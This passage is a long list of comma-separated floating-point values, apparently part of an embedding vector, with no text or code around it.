5672136,-0.008392835,-0.0033023814,0.0129869385,0.004391238,-0.009825951,-0.0012230322,-0.006151176,0.021238793,0.0042041307,0.0024602346,0.0016529786,0.021106133,0.025724508,0.0025165328,0.008646417,0.0128798755,-0.018485842,0.009803142,-0.008679602,0.017169932,-0.016340148,-0.007088546,0.007043419,-0.0034240137,-0.014943601,0.00020751334,-0.0035020574,0.01916533,-0.012498451,-0.0061477097,-0.008027784,-0.008327633,-0.021904903,-0.006802779,-0.021827022,-0.019649861,-0.0032628665,0.025373556,0.022603055,0.02683464,0.0022604412,0.0034574769,0.003705626,-0.0068853893,-0.00055758946,0.010275836,-0.017620988,0.025569849,0.0150241945,-0.026637169,-0.0063877013,-0.014303448,0.01748491,0.017789248,0.024404911,-0.007220727,-0.01909442,-0.003040628,-0.013846619,0.0004385023,-0.007704725,-0.0038783618,-0.02233429,-0.008290419,0.080781356,-0.0038124577,0.0029886486,-0.019276105,-0.008008834,0.0220969,-0.036491062,-0.024936695,-0.002351137,0.022619948,0.0063843797,0.005997752,-0.0034374434,0.0081627695,-0.025377057,-0.0022403176,0.015684027,-0.0011505052,-0.076284945,0.026841942,0.020143248,0.0127123,-0.0014453381,-0.0338866,0.003065656,0.013827001,-0.00015347885,-0.012750876,-0.027369417,-0.00069036795,0.015527674,0.0016518183,-0.02957546,0.01106068,-0.004493836,-0.026430907,-0.015061838,0.0126394015,-0.015374315,-0.002335576,-0.004388927,-0.010582941,-0.0048975484,-0.007741166,0.011373364,0.0022324077,0.01579438,-0.0059368685,-0.018669894,0.009506479,0.0010034621,-0.008470615,0.034651488,0.0018077036,-0.0070413765,0.010230055,0.030713813,-0.022889314,-0.02817256,0.009902227,-0.028921563,0.014055661,-0.005126413,0.026282351,0.02790136,-0.022893399,0.0125953285,0.029248923,-0.0020427604,0.007153822,-0.03407002,-0.0037844565,-0.020513607,-0.007957157,0.010264345,0.007943283,0.005417569,0.002108838,-0.021709498,0.023700112,0.0007823684,-0.0034326732,0.0039680856,-0.004955154,0.010241335,-0.004123009,-0.03055331,0.00449892,0.019076962,0.026678605,0.0133080045,0.027521888,-0.012097117,0.009108605,-0.0113248145,0.028049331,-0.004799555,-0.012811963,0.010468414,-0.010000133,0.018334268,0.025921306,-0.0151779475,0.01469113,-0.0025040559,0.020655734,-0.0014617955,-0.007369502,0.008397797,-0.022077193,0.04021029,-0.026570333,0.018793335,-0.047219984,-0.01554739,-0.0046405485,0.00138229,0.014083221,0.0154093485,-0.0009317736,0.00036537086,-0.025482906,-0.0038772617,0.009540772,-0.014637906,0.020116633,-0.0046057687,-0.020899331,0.001596707,-0.0028550453,-0.019488882,0.004008183,0.0006726287,-0.0017338996,0.0027950355,0.013173538,0.014859006,-0.023308534,0.016871884,-0.009787113,0.029620366,0.0023925533,-0.009892553,-0.024822736,-0.008403344,0.0035861165,0.007706838,-0.008382383,-0.011665817,0.009669645,-0.009818609,0.010696487,0.009092687,0.017808432,-0.034867495,-0.009772031,0.00040505623,-0.024531271,0.0020681636,-0.005713226,-0.0058202464,-0.0063862572,-0.015599551,0.025910627,-0.01610116,-0.00025767495,0.00946807,0.080461785,0.018389536,-0.014539729,0.0055620363,-0.010930047,-0.003467252,0.035364334,0.017058672,0.005299467,0.0026496109,0.0020007382,-0.013440406,0.0045380024,0.006923329,-0.0039109257,0.00016277278,-0.02623949,-0.0055467193,-0.045879148,-0.022888163,0.014472307,-0.008572033,-0.010242861,0.02697941,0.016280206,0.035296984,0.011260055,-0.015270413,0.0025596023,-0.00061013433,-0.011046502,0.026776683,0.024389898,0.0052657947,-0.022352867,0.024355834,0.019873947,-0.022095308,-0.03424269,0.0067738947,0.008885946,0.004260835,-0.004203939,-0.019621087,-0.006881634,0.03658082,-0.0077252868,-0.01592516,-0.017449379,0.015528475,0.018892014,0.0072254864,-0.019176494,0.022406096,-0.00046456378,0.01511302,0.009917629,-0.037609745,0.026709855,0.037240658,0.006356055,0.027123926,-0.0036950898,0.0017589587,-0.0019509412,0.026314983,-0.002179902,-0.025673885,-0.00233847,0.0012559446,0.0020683915,-0.0003919047,-0.0070504537,0.003812253,0.0015986459,0.019199973,-0.003644726,-0.026951874,0.011596394,0.039107103,-0.012762498,0.002423464,0.0052128737,0.021758894,-0.0012899161,-0.008583887,0.001332825,0.010432181,0.017845904,-0.0040768436,-0.0036882958,-0.0048981206,0.035711896,0.010936788,0.0053166053,0.019695431,0.009513597,0.013978983,-0.002384249,0.0006146518,0.015477262,0.004584759,0.001910314,-0.022163248,-0.0003170685,-0.0047785793,0.008821373,-0.002505905,0.008546713,0.030355008,-0.028025055,-0.0013814915,-0.0069350502,-0.02236279,-0.0033248425,-0.0052079624,-0.009311388,-0.015055454,-0.0062690694,0.0017340835,0.03313117,-0.0041160355,0.012906393,0.012694051,-0.005485432,-0.008910558,-0.0089742225,-0.014916274,-0.0030940315,0.031971075,0.012645527,0.0057796286,0.025030142,-0.024167731,0.03203225,0.019127881,-0.009343311,-0.017414268,0.027730783,0.014906064,0.017263008,0.01629045,0.017616251,-0.007570377,0.0024114083,0.02990008,0.04462206,-0.009695836,-0.023626283,0.0053858054,-0.0047332854,-0.00021321652,0.021040332,-0.028699547,0.002508077,0.0075066076,0.033889376,-0.010525141,-0.020579396,0.0013227944,0.022542631,-0.025315681,-0.007293691,0.0061320676,-0.013545034,0.028119486,-0.010120315,0.037967652,-0.01783547,-0.03621057,-0.0026199678,0.026295256,0.002228094,0.018468458,0.0030022967,-0.013619529,0.00523485,-0.022968855,0.02667192,0.0025921217,0.018309744,-0.017752586,-0.0062048696,-0.014426995,0.007017753,-0.02081467,-0.0076467316,0.002124242,-0.017709794,-0.013625004,-0.022986157,-0.026331572,0.023058629,0.013165606,-0.0037380415,-0.047215924,0.005437781,-0.0013376455,-0.0010851464,0.019916788,-0.015605344,-0.015016223,0.004445788,0.017195914,0.010982108,0.017851755,0.038942438,-0.016612897,0.00521381,-0.012585823,0.029644046,0.017258829,-0.0016517635,0.007893105,0.01891018,0.02298495,-0.013636058,0.012063715,0.035527915,0.0250743,0.012737435,-0.010578307,-0.0028623624,0.0068345363,0.007945844,-0.019747073,-0.0019901008,0.004279953,0.0033275033,-0.03141104,-0.010187068,-0.0013399285,-0.007027885,0.011702732,0.009397592,0.0033366887,-0.028756235,-0.011384284,0.0018813523,-0.005680537,-0.025578758,0.023733739,0.011331146,0.0055760792,0.0078000077,0.017384171,-0.014323105,0.013948961,0.020612985,-0.004718768,0.003934907,0.0097795855,0.013362536,-0.006921185,-0.0018527303,0.0073656416,0.0036388286,0.0035934167,-0.014232769,0.018413318,0.024864964,0.025124498,-0.003258927,0.0010926963,-0.0141278915,-0.00020112928,0.014579333,-0.035362262,-0.0052026873,-0.02281507,0.021161314,-0.008904979,0.0034959498,0.014092573,0.0032427548,-0.0032546152,-0.015376431,0.020990197,-0.037728325,0.0051129125,-0.020928774,0.014523905,-0.01265639,0.037278067,0.0051655048,0.004841659,-0.00042571072,-0.019985037,-0.000701787,0.007463168,-0.002665264,0.004898484,0.021479111,-0.009755173,-0.042579714,-0.026973514,-0.024884135,-0.051814497,-0.010048047,0.03327783,0.030887756,0.0063273874,0.011078423,0.010252945,0.0058247643,-0.020920958,0.00405328,-0.03898335,0.011831643,-0.008482874,-0.035621677,0.019821523,0.0005666694,-0.0053853393,-0.0057123452,-0.023758853,0.0014288989,0.0049239146,0.010270758,-0.008606122,0.00036054075,0.01654456,-0.02333577,0.022105634,-0.019306948,0.016912777,0.0069691916,0.024388215,0.013323383,0.010443974,0.009710732,0.01193805,-0.02437731,0.022670163,0.021435427,0.034629244,0.00966629,0.024467817,-0.0039163074,0.004285081,0.013634766,-0.016890425,0.00803714,0.042539887,0.019958904,-0.0039310306,0.024394413,-0.027846115,0.028840657,-0.023024842,-0.0023477688,-0.022053627,-0.00028076782,0.039207947,0.0084983865,0.021875517,0.0049646874,0.011042908,-0.01533853,-0.017699145,-0.017223163,0.009161269,0.023780674,0.0034442362,0.015618571,0.015701512,-0.0070217443,-0.018134383,-0.0039896662,-0.02067629,0.0028667788,-0.023072788,0.02488754,-0.008987782,0.000683498,-0.05222403,0.024846612,0.024993397,0.0106333755,-0.008733597,-0.019825438,-0.0068894997,0.0025299988,-0.022021366,-0.031719998,-0.041751828,0.004955996,0.02847034,-0.023243109,0.004833982,0.016384792,-0.006168137,-0.009967297,0.03239789,-0.0075392723,-0.018544191,0.009379013,-0.0048765233,0.027809538,0.01265491,0.025009304,0.0043224287,0.010063476,-0.0028567514,-0.01758067,-0.012732223,-0.0016890698,-0.007315445,0.0041118474,-0.0007139253,-0.008139769,-0.013845789,-0.017063122,-0.0073241172,0.012899476,-0.048205357,-0.0054388572,-0.020017974,0.014843535,-0.011062802,0.011376519,-0.018089937,0.02821533,0.010733595,-0.024914006,0.0063461117,0.006023608,0.0052779014,0.022356797,0.03999303,-0.00018219042,-0.040411934,0.0027785385,0.035535153,0.011321309,0.023141747,-0.00776086,-0.033508807,-0.019292584,-0.027425516,0.0038506445,-0.011737487,0.0014690965,0.013582452,-0.041451763,0.014771869,-0.009861538,0.020220825,0.025103588,0.01411754,0.0065737106,0.00090824696,0.011419657,-0.02381149,0.014071066,0.016693683,-0.011636561,-0.01350876,0.016225554,-0.025669083,-0.021665065,-0.038405176,-0.018114926,-0.013567899,0.0022114315,-0.008355288,0.00019319919,-0.02407572,0.027313758,-0.0035117452,-0.0008873971,-0.018162895,-0.020585323,0.008467994,-0.0018792639,0.020855114,0.0133708175,-0.0009792614,0.03610699,-0.008580297,-0.019722322,0.009697393,0.0013609338,0.00043414085,-0.0042230426,0.0033479778,-0.01589735,-0.022690723,0.014537689,-0.01601241,0.018647108,0.029045882,-0.009889875,-0.0012939424,0.0019709866,-0.02252619,-0.024078248,-0.011355082,0.02571395,-0.0034796428,0.0024039613,0.0026250673,-0.00082100154,0.011140011,-0.009542036,0.013465331,0.0027075498,-0.0005782329,0.017663924,0.0076261223,-0.023659023,-0.0051180013,-0.00045526397,-0.0014060508,0.021373905,0.008777352,-0.020651586,0.020124549,0.03321167,-0.013380854,-0.007227724,0.020808162,0.01029604,0.005819158,-0.005402822,0.019782102,-0.013740225,0.011490502,0.0180349,-0.03150319,-0.020321418,-0.015735175,-0.0033468986,-0.0064757923,-0.02805138,0.005201525,-0.0008896008,0.0033227103,0.02208883,-0.014396023,0.0029977623,-0.01596346,0.011606311,-0.002032457,0.0038502296,0.0104343295,0.01628081,-0.011496537,0.0059667854,0.012260987,-0.010695563,-0.0027175583,-0.00051626307,-0.0019226645,0.011829663,-0.012247363,-0.00009730389,0.006771573,-0.017417986,0.026211895,0.036254857,0.014711355,0.00030285053,-0.032310262,-0.017757693,0.019159574,-0.0065026297,-0.00072569604,-0.0028034714,0.023975533,0.021095125,-0.01586556,-0.028214332,-0.0031635272,-0.03653,0.039056085,-0.018041605,0.02881198,-0.0018197306,0.000576875,-0.01178379,-0.011273278,0.012587105,-0.01763544,0.002807576,-0.0017160377,0.006083498,0.008129194,0.018403899,0.008640293,-0.009374068,-0.0036259547,0.006372332,-0.0012821547,0.015624793,0.009884289,0.006431131,-0.0071077384,0.019723047,0.013112419,-0.0072622625,0.0009633003,-0.037683412,0.004403564,0.012603335,0.018493354,0.0035752945,-0.017132789,0.0065171113,-0.016603822,0.0006338773,0.008572268,-0.026177019,0.022450237,-0.0090744775,-0.012016499,-0.0106496485,0.036224786,-0.02030835,-0.020451052,0.001196965,-0.020693682,-0.0067165145,-0.0052201343,0.02776172,0.014116752,-0.018192107,0.017358702,-0.006896784,0.03464315,-0.0071103834,0.003393996,0.012876628,-0.008002235,0.00969143,-0.017777411,0.011692363,0.021614345,-0.016777756,0.0034540463,-0.01539431,0.026313707,0.0047990913,-0.000705374,-0.017883094,-0.019415447,-0.0078102658,0.018721763,-0.025992317,0.01039516,-0.030196648,-0.023701737,-0.0063330466,-0.03083445,-0.007625277,-0.005142582,-0.032427035,-0.0047013033,-0.026783986,-0.008870045,0.009097294,0.0028819402,0.005529553,-0.020663368,0.0020378071,0.0033209124,-0.012883854,0.00840464,0.012472553,0.020604165,0.0013766454,-0.017925689,-0.0023341088,0.00032802712,0.010468542,-0.011616487,-0.009900105,0.050986104,-0.0077577326,0.00068610715,0.0013331285,0.015997916,0.0035416847,0.017037531,0.0070963833,0.02849448,-0.013551385,-0.002022503,0.032462567,0.008951334,-0.0041181208,0.016813355,0.033531368,0.026960833,-0.0021428876,-0.012139245,0.02110717,0.018960688,0.008447117,0.011654053,0.017302644,0.016465925,-0.02574676,0.017995216,-0.014620174,0.026159924,0.01733784,0.0011871175,0.0098922765,0.013564807,0.005378603,0.00027759798,-0.011670457,-0.012115827,-0.016432263,-0.0025998617,-0.0031089624,0.0003362862,0.0065525156,-0.016906323,0.02246526,0.0130825,0.0062746354,-0.0077990703,0.013643929,-0.010415509,-0.00441791,0.004096655,-0.012348212,0.008310305,0.0013226101,-0.022296723,0.010690362,0.010204984,-0.022731613,-0.035111994,-0.0021143018,0.002640292,-0.021889381,-0.00820566,0.003302062,-0.016706452,-0.028753575,-0.005216352,-0.0052854423,0.014399142,-0.0073476657,0.027540216,-0.0043121516,0.00025397836,0.036207113,0.033600237,-0.000019654812,0.0014669346,-0.006899039,-0.0008395479,0.022972217,-0.00672571,-0.0053827646,-0.022393761,-0.0063068233,-0.0085351085,-0.017299516,-0.0071908524,-0.012989269,0.0004836212,0.015871221,-0.0011278726,-0.03412791,0.036734287,-0.015915602,0.036739502,-0.0006412163,-0.002371005,0.005826786,0.012511378,0.016379625,0.004176028,-0.037680075,0.01305562,0.009186335,-0.049289387,-0.0038501436,-0.012355649,-0.006985303,-0.0135718305,-0.030318337,-0.014377796,-0.017207136,0.0010690462,-0.008238302,-0.007741323,0.0200952,-0.027940294,0.010530695,0.01541325,0.0017632085,0.0001767212,-0.010761436,-0.0112542845,0.035669595,0.006745658,0.01184768,-0.023390532,-0.00016015243,-0.00024786068,0.024909496,0.02139038,-0.023989886,-0.0036104324,-0.0044163954,0.005887294,0.003829934,-0.0049271705,0.007284575,0.015510599,0.028668722,-0.011466851,-0.018065676,0.024917874,0.00026779965,-0.0019324515,0.014876611,0.015203749,-0.0018296562,0.007925936,0.005782565,-0.0025962854,-0.013766838,0.0014075933,-0.0083258115,-0.010413342,0.005994088,-0.019914938,-0.0059515643,-0.014215586,-0.019233821,-0.0049829124,-0.022128886,0.007929819,0.005207737,0.020900518,0.0010281607,0.027153278,0.0011416385,-0.0009575231,-0.015531439,0.014733315,-0.009453398,0.0070048226,-0.026092563,0.01780247,0.0205344,0.02088748,0.014313435,0.0039985715,0.00492936,-0.03542293,0.014682346,0.029102314,-0.010058902,-0.0072233966,0.013198285,0.004366367,-0.017608153,-0.033910982,0.01811405,0.016028415,0.011341804,0.013289538,-0.021979263,-0.008139948,0.008695871,-0.025152087,0.051473554,0.0035143227,0.012044676,-0.017587136,0.010715995,-0.019631853,0.013014078,-0.011449937,-0.009017698,-0.012317857,-0.048943408,-0.021127779,-0.011023923,-0.020704273,-0.0010997269,-0.0014384002,-0.003772358,0.0058764773,0.0085163275,0.012832425,-0.008904164,-0.000024602848,-0.010794923,0.0023503546,-0.012365505,0.008222862,0.022711495,-0.017862517,0.010763228,0.0031176663,-0.017001329,-0.0046239668,0.028184341,-0.004914923,-0.015145272,0.0023951575,0.005981553,-0.010859551,-0.012387498,-0.013278779,0.007074516,-0.020247495,0.047900617,-0.012545208,0.0034254142,-0.014256985,0.0027635891,-0.004370471,0.009314152,-0.022459378,-0.0029472178,-0.0038349652,-0.011924177,-0.015578147,-0.015065433,0.0021100193,-0.006455331,0.013505971,0.017608538,-0.015715621,0.0075113117,-0.0069910865,0.0005389452,-0.0076425998,-0.009602629,0.014367437,0.014634989,-0.027402094,-0.006036932,-0.01886229,0.02192257,0.0037312463,-0.007919072,0.0033927916,0.004070244,0.014570427,0.007692894,-0.010689735,-0.0039671334,-0.010861301,-0.005397701,-0.0055048964,0.028746298,-0.009778241,-0.026288422,0.003291135,-0.005847319,-0.001662817,0.054643687,0.013120783,0.017160673,0.0046316064,0.011356012,0.008673401,0.021952184,0.01934277,0.006672882,0.0014728511,-0.0035927999,0.012033151,-0.010185175,0.0074089454,0.022436507,-0.011240766,0.04284488,-0.001048988,-0.0032866523,-0.006977112,0.0015144555,0.014931128,0.024895918,0.007762581,0.0061402214,0.014688928,0.015685566,0.02695103,0.0046776677,-0.013271246,-0.014664914,-0.006772611,0.019115657,0.0006418199,-0.012575116,-0.05102556,0.0127094705,0.1547295,0.02746476,-0.028685668,0.038052674,-0.00139245,0.008201119,-0.089255854,-0.0010169055,-0.005224426,-0.007647534,0.0059234225,-0.018685097,-0.014600544,0.0025707565,0.0008371361,-0.0033972457,-0.014149697,-0.0063938396,0.0100726625,-0.0058149514,-0.011806634,-0.0049309605,-0.035226718,-0.006863402,-0.042640276,-0.0065486617,-0.0066433004,0.002764813,-0.016329706,-0.010566985,-0.00052363414,-0.009946348,0.021764724,-0.018049939,-0.022322968,0.016591625,0.022112949,0.011783026,-0.011728825,0.025950821,0.03777739,0.02260267,-0.015716001,-0.031896044,-0.1646706,0.008899857,-0.0019131273,-0.04023608,0.028616108,-0.015961614,0.006333431,-0.009928663,0.010016522,-0.021014774,-0.0046756733,0.0150657315,0.0043849605,0.021326764,-0.024049396,-0.01039237,-0.00065240875,-0.019300539,-0.0066071,-0.016599463,0.011073475,0.0030120437,-0.010034192,-0.033580348,-0.017937353,-0.0010960926,0.005018975,0.029356185,-0.013753408,-0.002923619,-0.024494072,0.021155927,-0.024523621,-0.0032465213,-0.0062370263,-0.007814442,-0.0031488023,0.019728309,-0.007273655,0.01830735,-0.0026095782,0.00036985872,-0.005282001,-0.010608841,-0.008868033,0.007617001,-0.0041000242,0.011347148,0.028918078,0.0026434383,0.004373057,-0.0045194393,-0.00783258,-0.008349882,-0.00805529,0.013343893,0.0021590681,-0.016015263,-0.016226402,0.009414397,-0.017004466,-0.020915298,-0.002060099,-0.01700395,0.04445036,0.0009427683,0.030881124,-0.02385643,-0.00071680703,0.022313077,-0.004301559,0.008179607,0.002126905,-0.012660229,0.010562823,0.007595415,-0.01788198,0.01974713,0.0077318684,-0.017805466,-0.0023670457,0.00029303698,-0.008842095,-0.012088329,0.014600526,-0.0010839468,0.0019027545,0.021309322,-0.0015000631,-0.016492587,0.016513446,-0.022846285,0.026901245,0.011479692,0.030012807,-0.006851638,0.025956305,-0.014830665,-0.029847158,0.016707852,0.008367601,-0.027196702,-0.031846035,-0.0097677205,-0.009388492,-0.0013542403,-0.010413191,-0.017664695,-0.028215766,-0.012174539,-0.012251296,0.007419424,0.019712029,0.012712233,-0.010152874,-0.013315839,0.02119986,-0.016763275,0.0131359305,0.006614821,-0.028686818,0.017121594,-0.011265607,0.023756178,0.037003905,0.031096121,-0.0091838585,-0.00981022,-0.006525453,0.010899263,-0.010009537,0.0033346794,-0.0122464355,0.0005790157,-0.017114915,0.002986876,-0.017508041,-0.012684132,-0.023961652,-0.0032072084,0.018661525,-0.0045417533,-0.0009213354,0.015770309,0.010454818,-0.023245024,0.033115767,0.020279402,-0.0049322816,-0.006676706,-0.014170383,0.028447546,-0.024596246,-0.027214672,0.002761785,0.06886678,-0.0034275947,-0.011829555,0.011467367,-0.0028344546,0.02446326,0.0073166057,-0.023845952,0.0024302243,-0.009446626,-0.022249449,-0.006797993,-0.015577578,0.0026194865,-0.01830329,0.027716205,0.006793841,0.03224809,0.01649336,0.0074909497,0.0040765298,-0.018827016,-0.00027269623,0.02438674,0.009513877,0.0084003685,-0.0022053826,0.011019613,-0.0049411147,0.001396784,0.0068329507,-0.02124591,0.0071390197,-0.005652768,0.02149733,-0.041141182,0.0037046757,0.005321919,0.0028316914,-0.0061825695,-0.005105216,0.011132436,0.0070138057,-0.0016902081,-0.009575207,-0.013309207,-0.01696907,-0.0076250494,0.016669253,-0.0008373856,0.008030232,0.009008252,-0.004561821,-0.0033800534,-0.0075760824,-0.009764149,0.0015844482,-0.0072368095,-0.00066085224,-0.014229992,0.0117420405,-0.012314681,-0.00994755,-0.0010422288,-0.01934998,0.0017666916,-0.0052834833,-0.0019172822,0.0008559349,0.00241628,-0.013443147,0.013009566,-0.014889898,0.008377633,-0.0042592357,-0.0062616323,-0.022244604,-0.00162226,-0.015228202,0.014180364,0.0013783593,0.020802068,0.0072516627,0.0050075566,-0.039361298,-0.047903065,-0.0068641566,0.031754937,-0.006408777,0.0009790601,0.0038997373,-0.005439029,0.020280022,0.0009804942,0.006102801,0.0075794826,0.009544868,0.015483331,0.02589134,0.0037412862,0.020335183,-0.011472624,0.012358852,-0.029959057,-0.014345112,-0.02032377,0.0088375695,-0.0049496554,0.004348654,-0.008403391,-0.0034770237,-0.012142315,0.003912345,-0.021277394,-0.014362914,0.03335045,-0.013436831,-0.016153764,0.021066234,0.0018814381,-0.014428822,0.00033454745,0.00572381,0.00039128476,0.0041123945,-0.023994409,0.009657615,0.00716286,-0.012303318,0.0099637015,0.019165369,0.04189436,-0.0069777183,-0.00036717195,-0.013849995,-0.008746428,0.0024589943,0.019970708,0.0024752973,0.031703636,-0.028180288,-0.015880706,-0.006039946,-0.008602984,-0.0023041696,0.004542333,-0.0012451881,0.00063888176,-0.010040405,-0.0025320784,-0.021077504,0.009943598,-0.00072763895,-0.009817477,-0.00317604,-0.000231264,-0.0043912474,-0.0047099185,-0.02107692,0.005565561,-0.004113296,0.02340002,0.0016593017,0.0063953935,-0.012960904,0.017369617,0.028686939,-0.0071498593,0.024181219,0.002019215,0.004940508,-0.004973241,0.012670116,-0.019387191,0.0010576923,-0.009158127,0.003892238,0.018432543,-0.0075701103,-0.01698524,0.027826756,0.006023711,-0.000005140903,-0.019355955,-0.0010807207,0.024807911,-0.0046281274,0.033530395,-0.017209772,-0.021895569,-0.012160055,-0.010920751,-0.0060529048,-0.0112427855,-0.008465147,0.01235847,0.019944182,-0.012443965,0.004341972,0.024952892,0.0018258896,0.032975882,-0.017377427,-0.022644825,-0.00806675,0.010993263,0.017704075,-0.0037762136,0.025955796,0.015331319,-0.002149303,-0.006092482,-0.025361309,0.008437272,-0.013638387,-0.028340725,0.002136876,0.030670123,0.0028162105,-0.040784255,0.008024322,-0.005013176,-0.0022898046,-0.0066461363,0.018378278,-0.009896772,-0.0074209794,0.07001484,-0.015589094,-0.023273842,0.009620044,0.0267558,0.00801632,0.0012201065,0.0042777085,-0.020476399,0.002831892,-0.017715733,-0.043789666,-0.0018034505,-0.0031969368,-0.015665429,-0.01076631,-0.003546423,-0.0051622572,-0.023955824,-0.011020474,0.0039762915,0.0016151303,0.007978003,0.0025717986,-0.014425431,-0.047716755,0.00070685486,-0.007910069,-0.012760109,0.010844568,0.0256797,-0.007141706,-0.01415036,-0.0060243993,-0.029621117,-0.002182954,-0.010777459,0.015315999,0.02739652,-0.000255519,0.027370932,0.0067412583,0.004107436,0.0053025,-0.013831489,0.0014718893,0.023610707,-0.012809322,-0.008785996,0.0046267537,0.0051781945,0.00747453,0.039476514,0.009148192,-0.01689762,0.009908088,0.0035452538,-0.00131051,-0.009494113,0.008290971,0.009524911,0.012877843,-0.027351791,-0.0062360987,0.021174286,0.031023975,-0.0072742677,-0.0060692145,0.0041223266,-0.0024933778,-0.0242832,0.012502691,-0.0014362038,0.017697617,-0.0013389246,-0.015948027,0.02605452,0.001305419,0.01045684,0.013493436,-0.009647191,0.0104594575,-0.00062705314,-0.0095262285,0.007050315,0.011788966,0.018198445,0.015406936,0.010315656,0.0027775462,0.035058513,-0.0068876813,0.010296792,0.006350915,-0.011249442,0.004288803,-0.00033650312,-0.02444717,0.011293198,-0.014542292,0.0073038014,-0.0033428245,-0.020928413,-0.007698949,0.0005730574,0.00084366434,-0.08386935,0.02342503,-0.016041385,0.0021294747,-0.010718466,-0.022380643,-0.02644644,0.045339093,-0.000502801,-0.046148766,-0.020956663,0.016454117,0.0032249375,-0.0016531965,0.00024685796,0.0113515705,-0.014598361,-0.004816581,0.0058732135,0.011566899,0.01922631,-0.003090677,0.011277815,-0.0039778254,0.004082087,0.01097762,0.015090303,0.020331979,0.023239747,0.0049955663,-0.0073826984,0.008090586,0.006352625,0.018762557,-0.0010968407,-0.007830418,-0.014110114,-0.0032543745,-0.0019639381,0.017611519,0.0052980455,-0.007895506,-0.0031684118,0.0020769697,0.041344598,0.026823305,0.016364586,0.010173841,0.014531743,0.041291792,-0.034478556,-0.015848491,0.012239318,-0.011511073,-0.0071655726,-0.024535233,0.02348495,-0.007110995,-0.005480706,0.0088424515,-0.009912967,-0.012277272,0.0028814247,-0.014141883,0.00023126806,-0.0023451962,-0.013648541,-0.025249835,-0.02823722,0.0075701,-0.012069309,0.013291363,-0.002800259,0.004711329,0.0038904855,0.0075525604,0.018915083,-0.010993307,-0.00274233,0.0020290585,-0.02201438,0.0024241272,0.018044654,0.018781763,0.00477614,-0.020471608,0.009197476,0.00056512805,-0.008484826,-0.007674959,0.013572577,0.021867787,-0.019751217,-0.0051172003,-0.011323771,-0.0011615285,0.0021704026,0.01992467,-0.00056650233,-0.026282623,0.0021951413,-0.00047759293,0.0024488117,-0.027130064,-0.07744508,-0.033876523,-0.0015730719,0.0024692498,-0.014236613,-0.0039904593,0.014640661,0.009468652,0.029305425,0.011851355,-0.021652594,-0.012232494,-0.022421194,-0.0000064289084,0.0018437201,0.004419529,-0.018958237,0.00007300156,-0.0030995226,0.0017611287,-0.00045403978,-0.013908961,0.0005736726,0.013018344,-0.00427114,0.018766206,0.0021555673,0.04803441,0.032690205,-0.01296238,0.010409438,-0.005279171,-0.014954088,0.022359835,-0.027870437,-0.000037368394,0.015708337,0.005651799,0.0013863678,0.02530845,0.0050035566,-0.0041593444,0.015614004,0.008075715,0.0020466743,-0.01973711,-0.025744721,0.027183177,-0.0008127481,0.029755611,0.015115298,-0.008986289,-0.0031873696,-0.017319288,-0.02275779,0.005289369,0.0034624273,0.0045605483,0.0004355511,0.025023926,-0.010573408,-0.015734473,-0.0036028868,0.025031835,-0.018364677,0.017510155,0.0014550992,0.008937194,0.0004110945,0.014595393,0.018465241,0.018492654,0.007140554,-0.015616169,0.025659064,0.018466977,0.013515835,0.019157441,-0.00020641445,0.01794433,-0.0055971574,-0.028619938,-0.004318602,0.019241933,-0.028923841,0.005847608,0.0010864891,0.014863416,-0.015208083,0.00010721725,0.011721726,0.02273626,-0.007361251,0.018012963,0.017338613,0.033684406,0.049165525,0.0066327206,0.0064685377,-0.012347704,-0.0129422955,-0.007268923,-0.002452034,-0.008514693,-0.028238438,0.01941286,0.01179947,-0.027276777,0.0045973537,-0.015548047,0.017666955,0.020221569,-0.0269699,0.010427681,0.00006556179,0.022811184,0.0022639588,0.017755978,0.013484878,-0.021736788,0.0061643315,0.007941846,-0.0019406469,-0.024227291,-0.004021037,0.0035764745,-0.023599215,0.025287399,0.0060348017,-0.022709697,-0.0024263873,-0.007599026,0.025851043,-0.018491521,-0.010495439,0.013102756,-0.016625663,0.014961407,0.009425533,0.013700075,0.005971327,-0.0045057726,0.010050431,-0.008464312,0.002012464,0.015134609,-0.0019377669,-0.02158404,-0.023040153,0.026896074,0.020076733,-0.011318813,0.011041899,-0.0064426656,0.0026444183,0.002749336,-0.009642304,-0.013822756,-0.0060086343,0.016299352,-0.019757966,0.011054475,0.019863242,-0.000006110311,0.014601395,0.007790136,-0.00061136426,0.017663235,0.0019128902,-0.0045502526,0.0015960053,-0.017954443,0.019125242,-0.0599646,-0.0053208056,0.014432817,0.026743114,0.021818839,0.032584563,0.034033395,-0.028302165,0.0051896013,-0.011866982,-0.0054951482,0.0064728907,0.016470952,0.0017011894,-0.0024220871,0.0024765478,0.0026867867,0.034918364,0.02259228,0.008348218,-0.02839406,0.026192501,-0.017621266,0.004885514,-0.0040043155,0.0028972195,-0.013427685,-0.018561436,0.010975714,0.003951899,-0.040657397,0.011994429,-0.014637056,0.0019408246,0.034290418,0.02002688,-0.014282018,-0.011588415,0.03518958,-0.0021566118,-0.01292871,0.016479177,0.05248438,-0.0088661825,-0.017865166,0.015639992,0.0008788055,-0.007382538,0.005023771,0.014288672,0.0016081363,-0.008488526,0.021453492,0.023990177,0.011192011,-0.016401108,-0.011797769,-0.0010014756,0.0024754605,-0.028148482,0.019257698,0.010208829,-0.014448192,0.013672622,0.004032003,-0.0022972894,0.00067717535,0.014669731,0.0094833635,0.032330316,0.018959,0.022290299,-0.006554131,-0.017056502,0.010548921,0.020477865,0.05033805,-0.0013442645,-0.0031812375,0.00043038733,-0.0037505121,0.008069831,-0.0035892907,-0.009771915,0.014298648,-0.028328793,0.02506292,-0.031053854,-0.013663996,-0.01629539,0.005038254,0.0040928265,0.013817301,0.0017514547,-0.010299785,-0.0048657344,0.020537494,0.00034017736,0.007808294,0.011806563,0.01039995,-0.017246054,-0.012554018,0.0048599127,-0.008481879,0.006231958,0.011436506,-0.0014980448,-0.0052631903,-0.025449755,0.002619432,-0.0030653381,0.030745631,0.002993341,0.00870473,0.01085798,0.00961496,0.00712135,-0.008245785,-0.006096012,-0.018414648,-0.005395148,0.036362447,0.01580302,-0.010390868,0.0073627927,0.008824204,0.0032251335,-0.027170084,0.00076165434,-0.008299582,0.026277328,-0.008729393,-0.008038395,0.014157182,0.0021886092,-0.023240099,0.0114968,0.015170829,-0.022852186,0.023583144,-0.0029512707,0.0031598883,0.010041866,0.009612087,-0.019834215,-0.0046105175,-0.00084194593,0.009296047,0.02439238,-0.015818818,-0.003036065,-0.011286993,0.019915227,0.02953401,0.011269312,-0.013517526,0.020255305,0.033273064,-0.02298576,-0.009474353,0.0031221,-0.008951455,-0.004566524,0.030330373,-0.005981921,0.0051228045,-0.008852928,0.0143738,0.013793186,-0.022014933,0.006174237,0.009575919,-0.004745961,0.004460768,-0.0129